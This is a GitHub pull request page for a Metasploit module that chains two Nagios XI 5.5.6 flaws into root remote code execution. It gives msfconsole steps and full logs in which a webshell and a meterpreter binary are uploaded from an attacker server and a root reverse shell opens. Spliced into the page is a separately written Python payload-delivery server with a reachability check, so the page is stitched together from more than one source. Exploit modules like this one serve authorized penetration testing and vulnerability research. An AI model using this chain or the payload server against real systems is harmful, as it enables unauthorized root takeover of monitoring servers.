Add Nagios XI 5.5.6 Root Remote Code Execution Module #11987

Merged (4 commits), Jun 25, 2019

Conversation

@yaumn (Contributor) commented Jun 17, 2019

Add Nagios XI 5.5.6 Root Remote Code Execution Module

This module exploits two vulnerabilities in Nagios 5.5.6:
  - CVE-2018-15708, which allows for unauthenticated remote code execution
  - CVE-2018-15710, which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

The exploit works as follows:
- A local HTTPS server is set up. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (unless the Nagios server is on the same network as yours, obviously); this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and runs the meterpreter executable, giving us a meterpreter session.

Verification

To test the exploit, I used Ubuntu 18.04 LTS x64 in a VM and I installed Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).

  • Start msfconsole
  • use exploit/linux/http/nagios_xi_root_rce
  • set RHOSTS IP
  • set RSRVHOST IP
  • exploit
  • Verify you get a root shell

Scenarios

msf5 > use exploit/linux/http/nagios_xi_root_rce 
msf5 exploit(linux/http/nagios_xi_root_rce) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf5 exploit(linux/http/nagios_xi_root_rce) > set RSRVHOST 192.168.0.50
RSRVHOST => 192.168.0.50
msf5 exploit(linux/http/nagios_xi_root_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.50:4444 
[*] Using URL: https://0.0.0.0:8080/yXgRPrO9L8zIt
[*] Local IP: https://192.168.0.50:8080/yXgRPrO9L8zIt
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/oDRVURAY82YcT
[*] Local IP: https://192.168.0.50:8080/oDRVURAY82YcT
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 192.168.0.57
[*] Meterpreter session 1 opened (192.168.0.50:4444 -> 192.168.0.57:33162) at 2019-06-16 23:44:34 +0100
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.57
OS           : Ubuntu 18.04 (Linux 4.18.0-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
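The description above relies on an out-of-band flow: a local HTTPS server hands the payload out at a random URL path, the target is made to fetch it, and so RSRVHOST/RSRVPORT must name an address the target can actually reach. The block below is an added example written for this page, not code from the module or from the PR, that reproduces that callback-server pattern in plain Python so the reachability of the listener can be checked before the exploit is run. It serves one constructed placeholder payload at a random path (in the spirit of paths like /yXgRPrO9L8zIt in the output above), answers 404 for anything else, records every hit with the client address, and includes a self-test fetch. It uses plain HTTP rather than the module's HTTPS, and the names PayloadServer, start_server, fetch and reachability_check are this example's own.

```python
# Added example, not part of the Metasploit module in this PR: a minimal
# out-of-band payload server of the kind the module description relies on.
# One payload body is served at a random URL path; every request is logged
# so the operator can confirm RSRVHOST is reachable from the target's side.
# Plain HTTP is used for brevity; the real module serves HTTPS.
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import urlopen


class PayloadServer(HTTPServer):
    """HTTP server that hands out a single payload at one secret path."""

    def __init__(self, bind, payload):
        super().__init__(bind, PayloadHandler)
        self.payload = payload
        # Random URL token, similar to the random URI component in the log
        self.token = secrets.token_urlsafe(10)
        self.hits = []          # (client_ip, requested_path) per request
        self.lock = threading.Lock()

    @property
    def path(self):
        return "/" + self.token

    def url_for(self, host):
        # host is the address the *target* must use to reach us (RSRVHOST)
        return f"http://{host}:{self.server_port}{self.path}"


class PayloadHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        srv = self.server
        with srv.lock:
            srv.hits.append((self.client_address[0], self.path))
        if self.path != srv.path:
            # Unknown path: answer 404 so casual probing learns nothing
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(srv.payload)))
        self.end_headers()
        self.wfile.write(srv.payload)

    def log_message(self, *args):  # keep stdout quiet; hits are kept in srv.hits
        pass


def start_server(payload, bind=("127.0.0.1", 0)):
    """Start the server in a background thread; port 0 picks a free port."""
    srv = PayloadServer(bind, payload)
    t = threading.Thread(target=srv.serve_forever, daemon=True)
    t.start()
    return srv


def fetch(url):
    """Return (status, body) for a GET without raising on HTTP error codes."""
    try:
        with urlopen(url, timeout=5) as r:
            return r.status, r.read()
    except HTTPError as e:
        return e.code, b""


def reachability_check(srv, host):
    """Fetch our own payload URL the way the target would and report whether
    the request arrived intact. Run this from a host on the target's side of
    any NAT/firewall to validate RSRVHOST/RSRVPORT before exploiting."""
    status, body = fetch(srv.url_for(host))
    delivered = status == 200 and body == srv.payload
    return delivered and any(p == srv.path for _, p in srv.hits)


if __name__ == "__main__":
    # Constructed stand-in for the PHP webshell the real module uploads.
    srv = start_server(b"<?php echo 'constructed placeholder'; ?>\n")
    print("serving payload at", srv.url_for("127.0.0.1"))
    print("reachable:", reachability_check(srv, "127.0.0.1"))
    srv.shutdown()
```

Run it on the attacking host and then fetch the printed URL from a machine on the target's network segment: if `srv.hits` stays empty, the RSRVHOST value the target will be handed is not an address it can reach, and the module's upload step would fail in the same way.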

@yaumn yaumn changed the title Add Nagios XI 5.5.6 Root Remote Code Execution exploit Add Nagios XI 5.5.6 Root Remote Code Execution Module Jun 18, 2019
@wchen-r7 wchen-r7 self-assigned this Jun 18, 2019
@wchen-r7 (Contributor) commented:

Sorry for the wait. For some reason I ended up going down some silly path trying to install Nagios XI, but it turned out to be actually easy. Anyway, the module works fine for me:

msf5 exploit(linux/http/nagios_xi_root_rce) > check
[*] 172.16.135.129:443 - The target appears to be vulnerable.
msf5 exploit(linux/http/nagios_xi_root_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.135.1:4444 
msf5 exploit(linux/http/nagios_xi_root_rce) > [*] Using URL: https://0.0.0.0:8080/0sSXoIkeTo2
[*] Local IP: https://192.168.0.21:8080/0sSXoIkeTo2
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/1vmZQikrphTQHf6
[*] Local IP: https://192.168.0.21:8080/1vmZQikrphTQHf6
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:58494) at 2019-06-24 23:58:00 -0500
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 172.16.135.129  172.16.135.1:4444 -> 172.16.135.129:58494 (172.16.135.129)

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > pwd
/usr/local/nagvis/share
meterpreter > 

But I'll do a little touch up here and there to clean up the code a little bit (don't worry, just minor stuff!). And then I will land this pull request. Thank you @yaumn. It's a really cool module! :-)

@yaumn (Contributor, Author) commented Jun 25, 2019

No problem, thank you for your time!

@wchen-r7 wchen-r7 merged commit 8723775 into rapid7:master Jun 25, 2019
@wchen-r7 (Contributor) commented Jun 25, 2019

Release Notes

The Nagios XI 5.5.6 Root RCE module has been added to the framework. It exploits two vulnerabilities in Nagios 5.5.6. The first is CVE-2018-15708, which allows for unauthenticated remote code execution. The second is CVE-2018-15710, which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

@wchen-r7 (Contributor) commented:

Some changes I made:

  • Module's filename changed to nagios_xi_magpie_debug.
  • Make the names of the files the exploit is uploading random.
  • Module documentation
  • Other cosmetic changes (like spacing)

@yaumn yaumn deleted the nagios-xi-rce branch June 25, 2019 22:59
@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 23, 2019